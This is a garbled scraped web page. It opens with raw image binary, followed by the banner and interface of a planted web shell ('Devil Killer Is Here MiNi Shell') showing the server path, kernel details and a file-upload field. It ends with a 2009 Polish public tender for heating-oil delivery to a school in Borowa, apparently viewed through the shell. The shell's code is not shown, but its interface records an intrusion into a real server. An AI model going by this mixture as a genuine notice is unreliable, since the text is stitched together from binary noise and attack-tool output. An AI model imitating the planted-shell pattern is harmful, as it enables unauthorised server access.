JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/14369-N-2009.html

<p class="kh_header"><b>Borowa: Dostawa oleju lekkiego opałowego do Szkoły Podstawowej w Borowej i Publicznego Gimnazjum w Borowej, ul. Parkowa 2/4 
 55-095 Mirków</b><br>
<b>Numer ogłoszenia: 14369 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Borowej , ul. Parkowa 2/4, 55-095 Borowa, woj. dolnośląskie, tel. 071 314 81 83, faks 071 314  81 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spborowa.yoyo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.spborowa.yoyo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oleju lekkiego opałowego do Szkoły Podstawowej w Borowej i Publicznego Gimnazjum w Borowej, ul. Parkowa 2/4 
 55-095 Mirków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	dostawa oleju opałowego lekkiego do kotłowni mieszczącej się w Szkole Podstawowej i Publicznym Gimnazjum w Borowej  przy ul. Parkowej 2/4 w ilości 36 tysięcy litrów dla Szkoły Podstawowej i 18 tysięcy litrów dla Publicznego Gimnazjum, odpowiadającego wymaganiom PN-C-96024, w terminie określonym w umowie. Transport na koszt własny Wykonawcy.
Zamówienie dotyczy dostaw oleju opałowego  o następujących parametrach (normach jakościowych):
1)	gęstość w temperaturze 15O C -   max 860 Ckg/m3;
2)	temperatura zapłonu - min. 56OC;
3)	wartość opałowa - min. 42,60 MJ/kg
4)	lepkość kinematyczna w temp. 20 OC- max 6,00 mm2/s;
5)	zawartość zanieczyszczeń stałych - max. 24 mg/kg
6)	zawartość siarki poniżej - max. 0,20 mg/kg;
7)	pozostałość po spopieleniu max. 0,001 m/m;
8)	zawartość wody max. 200 mg/kg;
9)	temperatura płynięcia max. - 20O C.
10)	skład frakcyjny: do 250o C - max 65 dest. %, do 350 o C - min. 85 dest.%
1.2.	 Oznaczenie wg Wspólnego Słownika Zamówień: 09.13.51.00-5 olej opałowy.
1.3.	Wykonawca gwarantuje, poprzez analizy wykonane na każdej partii oleju, że towar będzie zgodny z warunkami jakościowymi podanymi w potwierdzeniu zamówienia.
1.4.	Wykonawca do każdej dostawy załączy aktualne świadectwo jakości dostarczonego oleju opałowego.
1.5.	Zamawiający zastrzega sobie prawo poddania kontroli laboratoryjnej losowo wybranej próbki oleju opałowego dostarczonego przez Wykonawcę bez powiadomienia Wykonawcy, w celu kontroli jakościowej w zakresie zgodności dostarczonego i wykorzystywanego oleju opałowego z właściwościami fizyko - chemicznymi określonymi w niniejszej SIWZ.
1.6.	Badania wykonywane będą w laboratorium Wykonawcy lub w niezależnym laboratorium Instytutu Chemii i Technologii Nafty i Węgla Politechniki Wrocławskiej. Wybór laboratorium, spośród określonych wyżej, należy do Zamawiającego, który może zażądać wykonania badań w obydwu ośrodkach jednocześnie.
1.7.	Ujawnienie przy pomocy badań laboratoryjnych niezgodności parametrów określających właściwości próbki oleju opałowego danej dostawy z parametrami określonymi w umowie, będzie uznane za niezgodne z zamówieniem i będzie podlegało reklamacji.
1.8.	W przypadku reklamacji przez Zamawiającego jakości oleju, Wykonawca wyraża zgodę na wykonanie dokładnych badań w niezależnym laboratorium. Koszt wykonania badań obciąża stronę w zależności od jego wyniku.
1.9.	W przypadku reklamacji jakościowej lub ilościowej Wykonawca zobowiązuje się maksymalnie w ciągu 48 godzin od zgłoszenia reklamacji dostarczyć odpowiednią, zgodną z zamówieniem ilość oleju opałowego wolnego od wad lub brakującego w przypadku reklamacji ilościowej.
1.10.	Dostawa oleju opałowego nastąpi wg ceny obowiązującej w dniu dokonywania dostawy zareklamowanego oleju lub w dniu, w którym miała nastąpić dostawa, w przypadku braków ilościowych
1.11.	W przypadku gdy wadliwy olej zostanie wlany do zbiorników Zamawiającego, w których będzie znajdować się olej, Wykonawca będzie zobowiązany na swój koszt wymienić cały olej, zgodnie z ilością znajdującą się w zbiorniku po jego wypełnieniu przez Wykonawcę.

2.	INFORMACJE  OGÓLNE:
2.1.	Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro netto. 
2.2.	Podstawa prawna udzielenia zamówienia publicznego: art. 10 ust. 1 oraz art. 39-46 ustawy Prawo Zamówień Publicznych.
2.3.	Ilekroć w Specyfikacji Istotnych Warunków Zamówienia zwanej w dalszej części /SIWZ/,  zastosowane jest pojęcie /ustawa/ bez bliższego określenia, o jaką ustawę chodzi dotyczy ona ustawy - Prawo Zamówień Publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007 nr 223 poz. 1655 ze zm. ).
2.4.	Zgodnie z art. 2 pkt. 11 ustawy, o zamówienie publiczne ubiegać się może osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, oraz na podstawie art. 23 ustawy - podmioty te mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. 
2.5.	Wykonawca może zwrócić się na piśmie do Zamawiającego o wyjaśnienie SIWZ nie później niż na 6 dni przed upływem terminu otwarcia ofert (brana będzie pod uwagę data wpływu do siedziby Zamawiającego). Treść zapytania lub prośba o wyjaśnienie przekazana faxem musi zostać potwierdzona pismem, przesłanym na adres z pkt.3.8.
2.6.	Wszelkie oświadczenia, wnioski, zawiadomienia oraz inne informacje przekazywane za pomocą telefaksu, uważa się za złożone w terminie, jeżeli ich treść dotarła do Zamawiającego przed upływem terminu i została niezwłocznie potwierdzona pisemnie. Wysłanie np. zawiadomienia faksem nie będzie wystarczające, jeżeli zawiadomienie lub informacje nie dotarły do adresata w taki sposób, że mógł się z nimi zapoznać.
2.7.	W przypadku wniesienia zapytania dotyczącego postępowania, Zamawiający prześle treść wyjaśnień wszystkim Wykonawcom, którzy pobrali SIWZ i podali swoje dane adresowe, bez ujawniania źródła zapytania, oraz informację tą Zamawiający zamieści na stronie internetowej Szkoły Podstawowej w Borowej: www.spborowa.yoyo.pl oraz Publicznego Gimnazjum w Borowej: www.gimnazjumborowa.pl .
2.8.	Wszelkie pytania i wątpliwości dotyczące postępowania, należy kierować na piśmie na adres:
Szkoła Podstawowa w Borowej; Publiczne Gimnazjum w Borowej
             ul. Parkowa 2/4, 55-095 Mirków
Do bezpośredniego kontaktowania się z Wykonawcami upoważnione są niżej
wymienione osoby: 
Bernarda Sieczka - Dyrektor Szkoły Podstawowej w Borowej - tel. 071/ 314 81 83 
Barbara Kosińska - sekretarka Szkoły Podstawowej w Borowej - tel. 071/ 314 81 83

Elżbieta Turczyk 	- dyrektor Publicznego Gimnazjum w Borowej - tel. 071/ 399 46 77 kom. 693144109
Zenon Rybak 	- sekretarz Publicznego Gimnazjum w Borowej - tel. 071/ 399 46 77

Kontakt telefoniczny możliwy od poniedziałku do piątku w godz. od 8.00 do 15.00.
Kontakt osobisty możliwy od poniedziałku do piątku w siedzibie Zamawiającego w godzinach pracy.
2.9.	Zamawiający, w uzasadnionych przypadkach zastrzega sobie prawo zmiany lub uzupełnienia treści SIWZ. Zmiana może mieć miejsce w każdym czasie, przed upływem terminu do składania ofert. W przypadku wprowadzenia takiej zmiany, informacja o tym zostanie niezwłocznie przekazana wszystkim Wykonawcom, którym przekazano SIWZ, lub Wykonawcom, którzy poinformowali Zamawiającego o pobraniu ze strony internetowej SIWZ. Zmiana ta również zostanie zamieszczona na stronach internetowych: www.spborowa.yoyo.pl oraz www.gimnazjumborowa.pl i  będzie wiążąca dla wszystkich Wykonawców.
2.10.	W przypadku wprowadzenia zmian w SIWZ, Zamawiający może przedłużyć termin składania ofert z uwzględnieniem czasu niezbędnego do zapoznania się z wprowadzonymi zmianami i dokonania ewentualnych korekt w ofercie. O przedłużeniu terminu składania ofert Zamawiający niezwłocznie powiadomi wszystkich Wykonawców, którym przekazano SIWZ, oraz zamieści tę informację na stronach internetowych: www.spborowa.yoyo.pl oraz www.gimnazjumborowa.pl .
2.11.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta jest zgodna z ustawą, SIWZ, oraz zostanie uznana za najkorzystniejszą. 
2.12.	W toku dokonywania oceny złożonych ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert.
2.13.	Zamawiający poprawia oczywiste omyłki pisarskie w tekście oferty, omyłki rachunkowe w obliczeniu ceny oraz inne omyłki polegające na niezgodności oferty z siwz nie powodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.
2.14.	Wszelkie oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca składa w formie pisemnej wraz z ofertą w siedzibie Zamawiającego.

3.	INFORMACJA  O  PRZEWIDYWANYCH  ZAMÓWIENIACH UZUPEŁNIAJĄCYCH  O  KTÓRYCH  MOWA  W  ART. 67  USTAWY
Zamawiający dopuszcza możliwość zlecenia z wolnej ręki zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień, w wysokości nie większej niż 20% wartości zamówienia podstawowego. 

4.	OPIS SPOSOBU PRZEDSTAWIENIA OFERT WARIANTOWYCH
I  CZĘŚCIOWYCH
Zamawiający nie dopuszcza składania ofert wariantowych i częściowych.

5.	MIEJSCE I  TERMIN  REALIZACJI  ZAMÓWIENIA:
5.1.	Termin wykonania zamówienia:
Olej zostanie dostarczony po podpisaniu umowy każdorazowo w terminie trzech dni od daty telefonicznego zawiadomienia wyłonionego w toku postępowania. Wykonawcy przez Dyrektora Szkoły Podstawowej w Borowej bądź Dyrektora Publicznego Gimnazjum w Borowej w ilości przez niego wskazanej do końca czasu obowiązywania umowy. Umowa obowiązywała będzie od daty podpisania umowy do dnia 31 grudnia 2009 r.
5.2.	 Miejsce realizacji zamówienia:
       Szkoła Podstawowa, Publiczne Gimnazjum Borowej
      ul. Parkowa 2/4, 55-095 Mirków.

6.	WARUNKI UDZIAŁU W  POSTĘPOWANIU
O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy spełnią następujące warunki:
6.1.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
6.2.	 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
6.3.	 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
6.4.	 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.



7.	OŚWIADCZENIA  I DOKUMENTY  JAKIE  POWINNI  DOSTARCZYĆ WYKONAWCY
Ocena spełnienia warunków udziału w postępowaniu odbędzie się na zasadzie: 
spełnia / nie spełnia 

W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
7.1.	W zakresie warunków wskazanych w pkt. 7.1 i 7.4 SIWZ ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionego przez Wykonawcę:
a)	oświadczenia  (załącznik nr 2);
b)	Świadectwa Jakości wydanego przez podmiot uprawniony do kontroli jakości, potwierdzającego, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają Polskiej Normie- Olej Opałowy PN-C-96024 Lekki L1 (załącznik nr 7).

7.2.	W zakresie warunków wskazanych w pkt. 7.2 i 7.3 SIWZ ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów które stanowią:
a)	Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (załącznik nr 6);
b)	aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej. Dokument ten powinien być wystawiony przez właściwy organ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i może być przedstawiony w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawców podpisujących ofertę (załącznik nr 5);
Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do ewidencji działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem PRZEZ  ORGAN  WYDAJĄCY W/W  DOKUMENT  W WYMAGANYM  TERMINIE  pod kątem aktualności stanu faktycznego z zapisami w w/w dokumencie.
c)	aktualną decyzję o przyznaniu koncesji na wykonywanie działalności gospodarczej w zakresie obrotu paliwami ciekłymi (olejem opałowym) (załącznik nr 4);
d)	wykazu zamówień z ostatnich trzech lat (załącznik nr 3).
- jeżeli Wykonawca rozpoczął działalność w  czasie krótszym niż trzy lata  opisze w w/w załączniku zaistniałą sytuację, przedstawi wykaz zamówień zrealizowanych do tej pory (w przypadku braku zrealizowanych zamówień odpowiednio uzasadni ich brak).
Jeżeli Wykonawca działał pod inną nazwą lub w innej formie organizacyjno- prawnej w ciągu trzech ostatnich lat, przedstawi wykaz zamówień zrealizowanych w trzech ostatnich latach w poprzedniej formie lub pod poprzednia nazwą.

A
7.3.	W przypadku Wykonawcy działającego w ramach spółki prawa handlowego obowiązuje załączenie odpisu z Krajowego Rejestru Sądowego,
7.4.	W przypadku Wykonawców zorganizowanych w formie spółki cywilnej, każdy ze wspólników zobowiązany jest dołączyć wypis z ewidencji działalności gospodarczej,
7.5.	W przypadku Wykonawców występujących jako konsorcjum, należy dołączyć następujące dokumenty:
a)	kopię umowy stwierdzającej założenie takiej formy organizacyjnej (w umowie powinien znaleźć się zapis o powołaniu tzw. /Lidera- pełnomocnika/ konsorcjum, czyli członka konsorcjum wyznaczonego do kontaktów z Zamawiającym i mającego pełnomocnictwo ogólne do złożenia oferty i podpisania umowy w imieniu konsorcjum. Tak więc umowa musi określać ze szczególnym uwzględnieniem ustalenia wszystkich uczestników konsorcjum co do celu i zakresu uprawnień danych  /Liderowi-  pełnomocnikowi/.
b)	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania, w razie pełnienia czynności przekraczających zwykły zarząd, lider konsorcjum zobowiązany jest do przedstawienia Zamawiającemu pełnomocnictwa szczególnego, w którym to uwidoczni, że jest uprawniony do podejmowania takiej czynności. 
c)	/Lider- pełnomocnik/ konsorcjum składa ofertę (załączniki od 1 do 7 oraz dokumenty i oświadczenia określone w cz. A pkt. 8.5 )
d)	Ponadto należy dołączyć do oferty dla każdego z członków konsorcjum z osobny załącznik nr 2, oraz oświadczenie każdego z członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.

UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego Wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi udokumentować, iż posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.

B
7.6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że: 
a)	nie otwarto jego likwidacji;
b)	nie ogłoszono upadłości;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

Wyżej wymienione dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert.
Jeśli w kraju pochodzenia osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej oraz w pkt. 8.6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
W przypadku załączenia do oferty dokumentów sporządzonych w obcym języku, Wykonawcy zobowiązani są załączyć tłumaczenia tekstów na język polski. Tłumaczenie musi być poświadczone przez Wykonawcę. 

W przypadku złożenia oferty, bądź też dokonania innych czynności przez osobę lub osoby nie uwidocznione w odpisie z KRS- u dla spółek prawa handlowego, bądź nie będącą właścicielem firmy w przypadku innej formy prawnej, należy dołączyć prawnie skuteczne pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.

Dokumenty, o których mowa w punkcie 8.2 i 8.3 mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentów wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwość co do jej prawdziwości.




9.  WYMAGANA  ZAWARTOŚĆ  OFERTY:
9.1	 Wypełniony formularz oferty zgodnie ze wzorem (załącznik nr 1).
9.2	Dokumenty potwierdzające spełnienie warunków, o których mowa w części 8 SIWZ.


10	TERMIN  ZWIĄZANIA  OFERTĄ
Wykonawcy będą związani ofertą przez okres 30 dni, licząc od upływu terminu do składania ofert.

11	WYMAGANIA  DOTYCZĄCE  WADIUM
Zamawiający nie wymaga wnoszenia wadium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy spełnią następujące warunki:
7.1.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
7.2.	 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
7.3.	 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
7.4.	 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ocena spełnienia warunków udziału w postępowaniu odbędzie się na zasadzie: 
spełnia / nie spełnia 

W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
8.1.	W zakresie warunków wskazanych w pkt. 7.1 i 7.4 SIWZ ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionego przez Wykonawcę:
a)	oświadczenia  (załącznik nr 2);
b)	Świadectwa Jakości wydanego przez podmiot uprawniony do kontroli jakości, potwierdzającego, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają Polskiej Normie- Olej Opałowy PN-C-96024 Lekki L1 (załącznik nr 7).

8.2.	W zakresie warunków wskazanych w pkt. 7.2 i 7.3 SIWZ ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów które stanowią:
a)	Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (załącznik nr 6);
b)	aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej. Dokument ten powinien być wystawiony przez właściwy organ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i może być przedstawiony w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawców podpisujących ofertę (załącznik nr 5);
Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do ewidencji działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem PRZEZ  ORGAN  WYDAJĄCY W/W  DOKUMENT  W WYMAGANYM  TERMINIE  pod kątem aktualności stanu faktycznego z zapisami w w/w dokumencie.
c)	aktualną decyzję o przyznaniu koncesji na wykonywanie działalności gospodarczej w zakresie obrotu paliwami ciekłymi (olejem opałowym) (załącznik nr 4);
d)	wykazu zamówień z ostatnich trzech lat (załącznik nr 3).
	jeżeli Wykonawca rozpoczął działalność w  czasie krótszym niż trzy lata  opisze w w/w załączniku zaistniałą sytuację, przedstawi wykaz zamówień zrealizowanych do tej pory (w przypadku braku zrealizowanych zamówień odpowiednio uzasadni ich brak.).
	jeżeli Wykonawca działał pod inną nazwą lub w innej formie organizacyjno-  prawnej w ciągu trzech ostatnich lat, przedstawi wykaz zamówień zrealizowanych w trzech ostatnich latach w poprzedniej formie lub pod poprzednia nazwą.

A
8.3.	W przypadku Wykonawcy działającego w ramach spółki prawa handlowego obowiązuje załączenie odpisu z Krajowego Rejestru Sądowego,
8.4.	W przypadku Wykonawców zorganizowanych w formie spółki cywilnej, każdy ze wspólników zobowiązany jest dołączyć wypis z ewidencji działalności gospodarczej,
8.5.	W przypadku Wykonawców występujących jako konsorcjum, należy dołączyć następujące dokumenty:
a)	kopię umowy stwierdzającej założenie takiej formy organizacyjnej (w umowie powinien znaleźć się zapis o powołaniu tzw. /Lidera- pełnomocnika/ konsorcjum, czyli członka konsorcjum wyznaczonego do kontaktów z Zamawiającym i mającego pełnomocnictwo ogólne do złożenia oferty i podpisania umowy w imieniu konsorcjum. Tak więc umowa musi określać ze szczególnym uwzględnieniem ustalenia wszystkich uczestników konsorcjum co do celu i zakresu uprawnień danych  /Liderowi- pełnomocnikowi/.
b)	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania, w razie pełnienia czynności przekraczających zwykły zarząd, lider konsorcjum zobowiązany jest do przedstawienia Zamawiającemu pełnomocnictwa szczególnego, w którym to uwidoczni, że jest uprawniony do podejmowania takiej czynności. 
c)	/Lider- pełnomocnik/ konsorcjum składa ofertę (załączniki od 1 do 7 oraz dokumenty i oświadczenia określone w cz. A pkt. 8.5 )
